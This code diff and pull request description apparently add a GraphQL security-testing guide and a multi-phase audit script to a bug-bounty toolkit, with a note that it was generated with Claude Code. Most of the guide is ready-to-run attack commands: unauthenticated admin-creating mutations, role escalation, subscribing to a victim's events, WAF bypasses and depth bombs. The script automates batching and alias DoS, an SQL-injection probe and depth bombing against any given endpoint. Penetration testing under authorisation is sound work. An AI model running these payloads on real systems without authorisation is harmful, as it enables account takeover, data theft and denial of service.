+## 7. AUTHORIZATION BYPASS PATTERNS
+
+### Unauthenticated Queries
+
+```bash
+# Try sensitive queries without any auth token
+curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d '{"query":"{ users { id email role } }"}'
+
+# Try mutations without auth
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"mutation { createAdmin(email: \"test@example.com\", password: \"pass\") { id } }"}'
+```
+
+### Horizontal → Vertical Privilege Escalation
+
+```bash
+# Step 1: Find role mutation in schema
+# Step 2: Call it as a regular user
+curl -s -X POST https://target.com/graphql \
+  -H 'Cookie: session=NORMAL_USER' \
+  -d '{"query":"mutation { updateUserRole(userId: ME_ID, role: \"ADMIN\") { success } }"}'
+```
+
+### Deprecated Field Auth Bypass
+
+```bash
+# Deprecated fields are often forgotten — auth checks removed or loosened
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"{ userProfile(id: 2) { legacyToken adminFlags } }"}'
+```
+
+---
+
+## 8. SUBSCRIPTION ABUSE
+
+WebSocket-based subscriptions can leak cross-user events if not scoped per-user.
+
+```bash
+# Subscribe to another user's events (Burp WebSocket tab or wscat)
+# First: capture legitimate subscription query in Burp
+# Then: change userId to victim's ID
+
+wscat -c wss://target.com/graphql \
+  -s 'graphql-ws' \
+  --execute '{"type":"start","id":"1","payload":{"query":"subscription { orderUpdated(userId: VICTIM_ID) { status total } }"}}'
+
+# Check if subscription delivers events for ALL users (no scoping)
+# Critical if: payment status, message content, location updates
+```
+
+---
+
+## 9. DEPTH / COMPLEXITY BOMBS
+
+No query depth/complexity limits = DoS.
+
+```bash
+# Circular reference bomb (if schema has circular types)
+# e.g. User -> friends -> User -> friends -> ...
+python3 -c "
+depth = 20
+inner = 'id email'
+for _ in range(depth):
+    inner = f'friends {{ id {inner} }}'
+print('{\"query\": \"{ me { ' + inner + ' } }\"}')
+" | curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d @- -w '\nTime: %{time_total}s\n'
+
+# If response time grows linearly — report as DoS
+```
+
+---
+
+## 10. FINGERPRINTING & CVE HUNTING (graphw00f)
+
+Different GraphQL engines have different CVEs. Fingerprint first.
+
+```bash
+# Install
+pip install graphw00f
+
+# Fingerprint
+python3 -m graphw00f.main -d -t https://target.com/graphql
+
+# Common engines and their known issues:
+# Hasura       — auth bypass, remote schema injection
+# Apollo       — query depth issues in old versions
+# GraphQL-Go   — various older CVEs
+# Graphene     — Python injection risk in custom resolvers
+# Hot Chocolate — .NET, watch for SSRF in federation
+# WPGraphQL    — WordPress + GraphQL = lots of IDOR
+```
+
+---
+
+## 11. graphql-cop — Automated Attack Checklist
+
+```bash
+# Install
+pip install graphql-cop
+
+# Run all checks
+graphql-cop -t https://target.com/graphql
+
+# With auth
+graphql-cop -t https://target.com/graphql \
+  -H "Authorization: Bearer TOKEN"
+
+# Checks performed:
+# - Introspection enabled
+# - Field suggestions enabled
+# - GET method supported
+# - Query batching enabled
+# - Alias overloading
+# - Directive overloading
+# - Deep recursion allowed
+# - Character limit missing
+# - Mutation introspection
+```
+
+---
+
+## 12. WAF BYPASS FOR GRAPHQL
+
+```bash
+# Content-type switching (some WAFs only filter application/json)
+curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/graphql' \
+  -d '{ __schema { queryType { name } } }'
+
+# GET introspection (WAF may only block POST)
+curl -s "https://target.com/graphql?query=%7B__schema%7BqueryType%7Bname%7D%7D%7D"
+
+# Comment injection to break keyword matching
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"{ __sch#comment\nema { queryType { name } } }"}'
+
+# Fragment-based introspection
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"fragment s on __Schema { queryType { name } } query { ...s }"}'
+```
+
+---
+
+## 13. CHAINING FINDINGS
+
+| Chain | Severity |
+|---|---|
+| Introspection → find admin mutations → call without auth | Critical |
+| Batching → OTP brute force → account takeover | Critical |
+| Field suggestions → discover hidden field → IDOR | High |
+| Alias bomb → bypass rate limit → credential stuffing | High |
+| Unauthenticated subscription → real-time PII leak | High |
+| Depth bomb → no query limits → DoS | Medium |
+| Deprecated field → PII exposure | Medium |
+
+---
+
+## 14. REPORT TEMPLATE
+
+```
+Title: GraphQL [VULN TYPE] — [Impact One-liner]
+
+Example titles:
+- "GraphQL Introspection Enabled — Full Schema Disclosure on api.target.com"
+- "GraphQL Batching Allows OTP Brute Force — Account Takeover via Alias Bombing"
+- "GraphQL IDOR via Direct Object Queries — Access Any User's Private Data"
+
+Endpoint: POST https://target.com/graphql
+
+Request:
+[paste raw curl or HTTP request]
+
+Response:
+[paste relevant portion of response]
+
+Impact:
+[what an attacker can actually do RIGHT NOW — no hypotheticals]
+
+Steps to Reproduce:
+1. [exact curl or Burp Repeater step]
+2. [observe the response]
+3. [confirm impact]
+
+CVSS (approximate):
+- Introspection only: CVSS 5.3 (Medium) — info disclosure
+- IDOR cross-user: CVSS 7.5-8.5 (High)
+- Batching ATO chain: CVSS 9.0+ (Critical)
+- Unauthenticated mutation: CVSS 9.8 (Critical)
+
+Remediation:
+- Disable introspection in production (allow only in dev environments)
+- Enforce per-query depth limit (recommend <= 10)
+- Enforce complexity limits
+- Disable query batching or add per-batch rate limits
+- Validate object ownership in every resolver (not just at route level)
+- Remove field suggestions in production
+```
+
+---
+
+## KILL SIGNALS — Walk Away
+
+```
+- Endpoint returns 404/410 consistently — not active
+- All queries return generic "Unauthorized" with no suggestions — well-hardened
+- Rate limit fires on query 2 — strong protection, low ROI
+- Only __typename accessible, no types — schema fully locked down
+- Engine is Apollo Federation gateway only — attack the downstream services instead
+```
+
+---
+
+## TOOLS REFERENCE
+
+| Tool | Purpose | Install |
+|---|---|---|
+| `graphql_audit.sh` | Automated multi-phase sweep | this repo |
+| `graphw00f` | Engine fingerprinting | `pip install graphw00f` |
+| `clairvoyance` | Field discovery (no introspection) | `pip install clairvoyance` |
+| `graphql-cop` | Attack checklist runner | `pip install graphql-cop` |
+| `gqlmap` | SQL/NoSQL injection scanner | `pip install gqlmap` |
+| `inql` | Burp Suite extension — schema + IDOR | Burp BApp Store |
+| `graphql-voyager` | Visual schema explorer | browser tool |
+| `wscat` | WebSocket subscription testing | `npm i -g wscat` |

--- a/tools/external_arsenal.sh
+++ b/tools/external_arsenal.sh
@@ -83,6 +83,11 @@ ARSENAL_TOOLS=(
   "cupp|cred|pipx install cupp|github.com/Mebus/cupp"
   "trevorspray|cred|pipx install trevorspray|github.com/blacklanternsecurity/TREVORspray"
   "kerbrute|cred|GOBIN=\$HOME/go/bin go install github.com/ropnop/kerbrute@latest|github.com/ropnop/kerbrute"
+  # ── GraphQL ─────────────────────────────────────────────────────────────
+  "graphw00f|graphql|pip install graphw00f|github.com/dolevf/graphw00f"
+  "clairvoyance|graphql|pip install clairvoyance|github.com/nikitastupin/clairvoyance"
+  "gqlmap|graphql|pip install gqlmap|github.com/nicola-inchingolo/gqlmap"
+  "graphql-cop|graphql|pip install graphql-cop|github.com/dolevf/graphql-cop"
   # ── JWT / auth ──────────────────────────────────────────────────────────
   "jwt_tool|jwt|pipx install jwt-tool|github.com/ticarpi/jwt_tool"
   # ── Bug bounty scope tooling ────────────────────────────────────────────

--- a/tools/graphql_audit.sh
+++ b/tools/graphql_audit.sh
@@ -1,0 +1,340 @@
+#!/bin/bash
+# =============================================================================
+# GraphQL Security Audit — multi-phase sweep for common GraphQL vulnerabilities
+#
+# Phases: introspection -> fingerprint -> field discovery -> batching DoS ->
+#         alias bomb -> injection scan (gqlmap) -> graphql-cop checklist
+#
+# Falls back to built-in curl probes when optional tools are missing.
+#
+# Usage:
+#   ./tools/graphql_audit.sh <graphql-endpoint-url>
+#   ./tools/graphql_audit.sh <url> --cookie "session=abc"
+#   ./tools/graphql_audit.sh <url> --header "Authorization: Bearer TOKEN"
+#   ./tools/graphql_audit.sh <url> --proxy http://127.0.0.1:8080
+#   ./tools/graphql_audit.sh <url> --output-dir ./findings/target/graphql
+# =============================================================================
+
+set -uo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+. "$SCRIPT_DIR/external_arsenal.sh"
+
+GREEN='\033[0;32m'; RED='\033[0;31m'; YELLOW='\033[1;33m'
+CYAN='\033[0;36m'; MAG='\033[0;35m'; BOLD='\033[1m'; NC='\033[0m'
+
+log()  { echo -e "${CYAN}[*]${NC} $1"; }
+ok()   { echo -e "${GREEN}[+]${NC} $1"; }
+hit()  { echo -e "${MAG}[HIT]${NC} $1"; }
+warn() { echo -e "${YELLOW}[!]${NC} $1"; }
+err()  { echo -e "${RED}[-]${NC} $1" >&2; }
+skip() { echo -e "${YELLOW}[~]${NC} $1 (tool not installed)"; }
+
+# ---------------------------------------------------------------------------
+# Argument parsing
+# ---------------------------------------------------------------------------
+URL=""; COOKIE=""; AUTH_HEADER=""; PROXY=""; OUT_DIR=""
+
+while [ "$#" -gt 0 ]; do
+  case "$1" in
+    --cookie)     shift; COOKIE="${1:-}" ;;
+    --header)     shift; AUTH_HEADER="${1:-}" ;;
+    --proxy)      shift; PROXY="${1:-}" ;;
+    --output-dir) shift; OUT_DIR="${1:-}" ;;
+    -h|--help)    sed -n '2,12p' "$0"; exit 0 ;;
+    http*)        URL="$1" ;;
+    *)            err "Unknown argument: $1"; exit 2 ;;
+  esac
+  shift
+done
+
+[ -z "$URL" ] && { err "GraphQL endpoint URL required"; exit 2; }
+
+# ---------------------------------------------------------------------------
+# Setup
+# ---------------------------------------------------------------------------
+TIMESTAMP=$(date +%Y%m%d_%H%M%S)
+HOST=$(echo "$URL" | awk -F/ '{print $3}' | tr -d '[:space:]')
+OUT_DIR="${OUT_DIR:-$(pwd)/findings/graphql/${HOST}/${TIMESTAMP}}"
+mkdir -p "$OUT_DIR"
+
+SUMMARY="$OUT_DIR/summary.txt"
+echo "GraphQL Audit -- $URL" > "$SUMMARY"
+echo "Date: $(date)" >> "$SUMMARY"
+echo "---" >> "$SUMMARY"
+
+# Build common curl args
+CURL_ARGS=(-s --max-time 30)
+[ -n "$COOKIE" ]      && CURL_ARGS+=(-H "Cookie: $COOKIE")
+[ -n "$AUTH_HEADER" ] && CURL_ARGS+=(-H "$AUTH_HEADER")
+[ -n "$PROXY" ]       && CURL_ARGS+=(--proxy "$PROXY")
+
+_gql_post() {
+  curl "${CURL_ARGS[@]}" -X POST "$URL" \
+    -H 'Content-Type: application/json' \
+    -d "$1"
+}
+
+# shellcheck source=banner.sh
+. "$SCRIPT_DIR/banner.sh"
+print_banner "GraphQL Security Audit" "$URL" \
+    "Phases|introspection . fingerprint . field-discovery . batching . alias . injection . cop" \
+    "Output|$OUT_DIR" \
+    "Auth|${COOKIE:+cookie set}${AUTH_HEADER:+header set}${COOKIE:-}${AUTH_HEADER:-(none)}"
+
+# ---------------------------------------------------------------------------
+# Phase 0: Connectivity check
+# ---------------------------------------------------------------------------
+log "Phase 0 -- connectivity check"
+HTTP_CODE=$(curl "${CURL_ARGS[@]}" -o /dev/null -w '%{http_code}' -X POST "$URL" \
+  -H 'Content-Type: application/json' \
+  -d '{"query":"{ __typename }"}' 2>/dev/null || echo "000")
+
+if [ "$HTTP_CODE" = "000" ]; then
+  err "Cannot reach $URL -- aborting"
+  exit 1
+fi
+
+ok "Endpoint responded: HTTP $HTTP_CODE"
+echo "connectivity: HTTP $HTTP_CODE" >> "$SUMMARY"
+
+# ---------------------------------------------------------------------------
+# Phase 1: Introspection
+# ---------------------------------------------------------------------------
+log "Phase 1 -- introspection probe"
+
+INTROSPECT_QUERY='{"query":"{ __schema { queryType { name } mutationType { name } subscriptionType { name } types { kind name fields(includeDeprecated: true) { name isDeprecated } } } }"}'
+
+INTROSPECT_RESP=$(_gql_post "$INTROSPECT_QUERY")
+INTROSPECT_OUT="$OUT_DIR/introspection.json"
+
+if echo "$INTROSPECT_RESP" | grep -q '"__schema"'; then
+  hit "Introspection ENABLED -- schema dumped to introspection.json"
+  echo "$INTROSPECT_RESP" | python3 -m json.tool > "$INTROSPECT_OUT" 2>/dev/null \
+    || echo "$INTROSPECT_RESP" > "$INTROSPECT_OUT"
+  echo "introspection: ENABLED" >> "$SUMMARY"
+
+  # Extract interesting type/field names
+  INTERESTING=$(echo "$INTROSPECT_RESP" | python3 -c "
+import sys, json, re
+try:
+    data = json.load(sys.stdin)
+    types = data.get('data',{}).get('__schema',{}).get('types',[])
+    hits = []
+    keywords = re.compile(r'admin|internal|secret|token|password|role|debug|legacy|private|key|flag', re.I)
+    for t in types:
+        if keywords.search(t.get('name','')):
+            hits.append('TYPE: ' + t['name'])
+        for f in (t.get('fields') or []):
+            if keywords.search(f.get('name','')):
+                hits.append('FIELD: ' + t['name'] + '.' + f['name'])
+    print('\n'.join(hits) if hits else 'no obvious sensitive names found')
+except Exception as e:
+    print('parse error: ' + str(e))
+" 2>/dev/null)
+  echo -e "\n${BOLD}Interesting schema names:${NC}"
+  echo "$INTERESTING"
+  echo "$INTERESTING" > "$OUT_DIR/interesting_fields.txt"
+else
+  warn "Introspection appears disabled (or blocked)"
+  echo "$INTROSPECT_RESP" > "$INTROSPECT_OUT"
+  echo "introspection: DISABLED" >> "$SUMMARY"
+
+  # Try bypass: GET method
+  log "Trying introspection via GET..."
+  GET_RESP=$(curl "${CURL_ARGS[@]}" -X GET \
+    "$URL?query=%7B__schema%7BqueryType%7Bname%7D%7D%7D" 2>/dev/null)
+  if echo "$GET_RESP" | grep -q '"__schema"'; then
+    hit "Introspection reachable via GET -- WAF bypass found"
+    echo "introspection_get_bypass: YES" >> "$SUMMARY"
+  fi
+fi
+
+# Field suggestions probe (works even when introspection is off)
+log "Checking field suggestions..."
+SUGGEST_RESP=$(_gql_post '{"query":"{ usr { id } }"}')
+if echo "$SUGGEST_RESP" | grep -qi "did you mean\|suggestions"; then
+  hit "Field suggestions ENABLED -- schema leakable via clairvoyance"
+  echo "field_suggestions: ENABLED" >> "$SUMMARY"
+else
+  echo "field_suggestions: disabled or no hints" >> "$SUMMARY"
+fi
+
+# ---------------------------------------------------------------------------
+# Phase 2: Engine fingerprinting (graphw00f)
+# ---------------------------------------------------------------------------
+log "Phase 2 -- engine fingerprinting"
+FINGER_OUT="$OUT_DIR/fingerprint.txt"
+
+if python3 -c "import graphw00f" 2>/dev/null; then
+  python3 -m graphw00f.main -d -t "$URL" \
+    ${PROXY:+--proxy "$PROXY"} 2>&1 | tee "$FINGER_OUT"
+  echo "fingerprint: see fingerprint.txt" >> "$SUMMARY"
+else
+  skip "graphw00f"
+  echo "(install: pip install graphw00f)" > "$FINGER_OUT"
+  echo "fingerprint: skipped (graphw00f not installed)" >> "$SUMMARY"
+fi
+
+# ---------------------------------------------------------------------------
+# Phase 3: Field discovery via clairvoyance
+# ---------------------------------------------------------------------------
+log "Phase 3 -- field discovery (clairvoyance)"
+CLAIRVOYANCE_OUT="$OUT_DIR/field_suggestions.json"
+
+if python3 -c "import clairvoyance" 2>/dev/null; then
+  CLAIRVOYANCE_ARGS=(-u "$URL" -o "$CLAIRVOYANCE_OUT")
+  [ -n "$AUTH_HEADER" ] && CLAIRVOYANCE_ARGS+=(-H "$AUTH_HEADER")
+  [ -n "$PROXY" ]       && CLAIRVOYANCE_ARGS+=(--proxy "$PROXY")
+  python3 -m clairvoyance "${CLAIRVOYANCE_ARGS[@]}" 2>&1 | tail -20
+  ok "Clairvoyance output: $CLAIRVOYANCE_OUT"
+  echo "clairvoyance: completed" >> "$SUMMARY"
+else
+  skip "clairvoyance"
+  echo "(install: pip install clairvoyance)" > "$CLAIRVOYANCE_OUT"
+  echo "clairvoyance: skipped (not installed)" >> "$SUMMARY"
+fi
+
+# ---------------------------------------------------------------------------
+# Phase 4: Query batching DoS
+# ---------------------------------------------------------------------------
+log "Phase 4 -- batching DoS test"
+BATCH_OUT="$OUT_DIR/batching_dos.txt"
+
+T_SINGLE=$(curl "${CURL_ARGS[@]}" -X POST "$URL" \
+  -H 'Content-Type: application/json' \
+  -d '{"query":"{ __typename }"}' \
+  -o /dev/null -w '%{time_total}' 2>/dev/null)
+
+BATCH_PAYLOAD=$(python3 -c "import json; print(json.dumps([{'query':'{ __typename }'}]*100))")
+BATCH_STATUS=$(curl "${CURL_ARGS[@]}" -X POST "$URL" \
+  -H 'Content-Type: application/json' \
+  -d "$BATCH_PAYLOAD" \
+  -o "$BATCH_OUT" -w '%{http_code}' 2>/dev/null)
+T_BATCH=$(curl "${CURL_ARGS[@]}" -X POST "$URL" \
+  -H 'Content-Type: application/json' \
+  -d "$BATCH_PAYLOAD" \
+  -o /dev/null -w '%{time_total}' 2>/dev/null)
+
+echo "single query time: ${T_SINGLE}s" | tee -a "$BATCH_OUT"
+echo "100-query batch time: ${T_BATCH}s  HTTP: $BATCH_STATUS" | tee -a "$BATCH_OUT"
+
+if grep -q '^\[' "$BATCH_OUT" 2>/dev/null; then
+  hit "Array batching ACCEPTED -- ${T_BATCH}s for 100 queries (potential DoS / brute-force amplifier)"
+  echo "array_batching: ENABLED" >> "$SUMMARY"
+else
+  warn "Array batching returned HTTP $BATCH_STATUS -- may be disabled"
+  echo "array_batching: likely disabled (HTTP $BATCH_STATUS)" >> "$SUMMARY"
+fi
+
+# Alias bomb (500 aliases)
+log "Testing alias bombing..."
+ALIAS_PAYLOAD=$(python3 -c "
+aliases = ' '.join(f'q{i}: __typename' for i in range(500))
+import json; print(json.dumps({'query': '{ ' + aliases + ' }'}))
+")
+ALIAS_OUT="$OUT_DIR/alias_bomb.txt"
+curl "${CURL_ARGS[@]}" -X POST "$URL" \
+  -H 'Content-Type: application/json' \
+  -d "$ALIAS_PAYLOAD" \
+  -o "$ALIAS_OUT" -w '\n500-alias query: HTTP %{http_code}  time: %{time_total}s\n' 2>/dev/null \
+  | tee -a "$ALIAS_OUT"
+
+if grep -q 'q0' "$ALIAS_OUT" 2>/dev/null; then
+  hit "Alias bomb ACCEPTED -- rate-limit bypass possible"
+  echo "alias_bombing: ENABLED" >> "$SUMMARY"
+else
+  echo "alias_bombing: blocked or limited" >> "$SUMMARY"
+fi
+
+# ---------------------------------------------------------------------------
+# Phase 5: Injection scan (gqlmap)
+# ---------------------------------------------------------------------------
+log "Phase 5 -- injection scan"
+GQLMAP_OUT="$OUT_DIR/gqlmap.txt"
+
+if _have gqlmap; then
+  GQLMAP_ARGS=(--target "$URL" --query '{ users(search: GQLMAP) { id } }')
+  [ -n "$PROXY" ] && GQLMAP_ARGS+=(--proxy "$PROXY")
+  gqlmap "${GQLMAP_ARGS[@]}" 2>&1 | tee "$GQLMAP_OUT" || true
+  echo "injection_scan: completed (see gqlmap.txt)" >> "$SUMMARY"
+else
+  skip "gqlmap"
+  echo "(install: pip install gqlmap)" > "$GQLMAP_OUT"
+  echo "injection_scan: skipped (gqlmap not installed)" >> "$SUMMARY"
+
+  # Built-in quick SQLi probe
+  log "Built-in SQLi quick probe..."
+  SQLI_RESP=$(_gql_post '{"query":"{ users(search: \"1'\''--\") { id } }"}' 2>/dev/null || true)
+  if echo "$SQLI_RESP" | grep -qi "syntax\|mysql\|pgsql\|sqlite\|ORA-\|error in your SQL"; then
+    hit "SQL error in response -- possible SQLi in search argument"
+    echo "$SQLI_RESP" >> "$GQLMAP_OUT"
+    echo "sqli_quick_probe: POSSIBLE HIT" >> "$SUMMARY"
+  else
+    echo "sqli_quick_probe: no obvious errors" >> "$SUMMARY"
+  fi
+fi
+
+# ---------------------------------------------------------------------------
+# Phase 6: graphql-cop checklist
+# ---------------------------------------------------------------------------
+log "Phase 6 -- graphql-cop attack checklist"
+COP_OUT="$OUT_DIR/cop_report.txt"
+
+if _have graphql-cop; then
+  COP_ARGS=(-t "$URL")
+  [ -n "$AUTH_HEADER" ] && COP_ARGS+=(-H "$AUTH_HEADER")
+  graphql-cop "${COP_ARGS[@]}" 2>&1 | tee "$COP_OUT"
+  echo "graphql_cop: completed (see cop_report.txt)" >> "$SUMMARY"
+else
+  skip "graphql-cop"
+  echo "(install: pip install graphql-cop)" > "$COP_OUT"
+  echo "graphql_cop: skipped (not installed)" >> "$SUMMARY"
+fi
+
+# ---------------------------------------------------------------------------
+# Phase 7: Depth limit probe (built-in)
+# ---------------------------------------------------------------------------
+log "Phase 7 -- depth limit probe"
+DEPTH_OUT="$OUT_DIR/depth_bomb.txt"
+
+DEPTH_QUERY=$(python3 -c "
+depth = 15
+inner = 'id'
+for _ in range(depth):
+    inner = f'edges {{ node {{ {inner} }} }}'
+import json; print(json.dumps({'query': '{ viewer { ' + inner + ' } }'}))
+")
+
+DEPTH_HTTP=$(curl "${CURL_ARGS[@]}" -X POST "$URL" \
+  -H 'Content-Type: application/json' \
+  -d "$DEPTH_QUERY" \
+  -o "$DEPTH_OUT" -w '%{http_code}' 2>/dev/null)
+T_DEPTH=$(curl "${CURL_ARGS[@]}" -X POST "$URL" \
+  -H 'Content-Type: application/json' \
+  -d "$DEPTH_QUERY" \
+  -o /dev/null -w '%{time_total}' 2>/dev/null)
+
+echo "depth-15 query: HTTP $DEPTH_HTTP  time: ${T_DEPTH}s" | tee -a "$DEPTH_OUT"
+if [ "$DEPTH_HTTP" = "200" ] && ! grep -qi "max.*depth\|query.*depth\|complexity" "$DEPTH_OUT" 2>/dev/null; then
+  hit "Deep query (depth=15) accepted -- no depth limit detected"
+  echo "depth_limit: NONE DETECTED" >> "$SUMMARY"
+else
+  echo "depth_limit: enforced or endpoint rejected query" >> "$SUMMARY"
+fi
+
+# ---------------------------------------------------------------------------
+# Summary
+# ---------------------------------------------------------------------------
+echo ""
+echo -e "${BOLD}====== AUDIT SUMMARY ======${NC}"
+cat "$SUMMARY"
+echo ""
+ok "All output saved to: $OUT_DIR"
+echo ""
+echo -e "${YELLOW}Next steps:${NC}"
+echo "  1. Introspection on  -> import introspection.json into graphql-voyager or InQL (Burp)"
+echo "  2. Batching accepted -> chain with login/OTP mutation for ATO PoC"
+echo "  3. Field suggestions -> run clairvoyance manually with seed types"
+echo "  4. Check interesting_fields.txt for IDOR / auth bypass targets"
+echo "  5. Load cop_report.txt for remaining manual checks"


### PR DESCRIPTION
## Summary

- **New skill** `skills/graphql-audit/SKILL.md` — 14-section GraphQL hunting guide covering every common bug class: introspection abuse, field suggestion enumeration (clairvoyance when introspection is off), batching DoS + alias bombing (OTP brute-force chains), IDOR via direct object access, SQLi/NoSQLi via arguments, subscription cross-user leaks, depth/complexity bombs, WAF bypass techniques, finding chains with severity ratings, and a ready-to-submit report template with CVSS guidance.

- **New tool** `tools/graphql_audit.sh` — 7-phase automated sweep that works out of the box with just `curl` + `python3`. Wraps `graphw00f` (fingerprint), `clairvoyance` (field discovery), `gqlmap` (injection), and `graphql-cop` (attack checklist) when installed; falls back to built-in probes otherwise. Outputs a structured `findings/graphql/<host>/<timestamp>/` directory with `summary.txt`.

- **Arsenal update** `tools/external_arsenal.sh` — registers `graphw00f`, `clairvoyance`, `gqlmap`, and `graphql-cop` with install hints so `/arsenal` surfaces them.

- **Docs** `CLAUDE.md` — skill table, `/graphql-audit` command, and tools list all updated.

## Usage

```bash
# Load the skill
/graphql-audit

# Run the tool (works out of the box, no extra installs needed)
bash tools/graphql_audit.sh https://target.com/graphql

# With auth + Burp proxy
bash tools/graphql_audit.sh https://target.com/graphql \
  --header "Authorization: Bearer TOKEN" \
  --proxy http://127.0.0.1:8080
```

## What the tool checks

| Phase | Check | Tool |
|---|---|---|
| 0 | Connectivity + HTTP code | curl |
| 1 | Introspection + GET bypass + field suggestions | curl |
| 2 | Engine fingerprinting | graphw00f |
| 3 | Field discovery (introspection off) | clairvoyance |
| 4 | Array batching + alias bomb DoS | curl + python3 |
| 5 | SQLi / NoSQLi injection | gqlmap / built-in |
| 6 | Full attack checklist | graphql-cop |
| 7 | Depth limit probe | curl + python3 |

## Test plan

- [ ] `bash tools/graphql_audit.sh https://target.com/graphql` runs without errors on a live target
- [ ] Introspection response is saved to `findings/graphql/<host>/introspection.json`
- [ ] `summary.txt` accurately reflects hit/miss per phase
- [ ] `--cookie`, `--header`, `--proxy`, `--output-dir` flags all accepted
- [ ] Script exits cleanly with error message when no URL is provided
- [ ] `/arsenal graphw00f` shows the correct install hint
- [ ] `/graphql-audit` loads the skill in Claude Code

🤖 Generated with [Claude Code](https://claude.com/claude-code)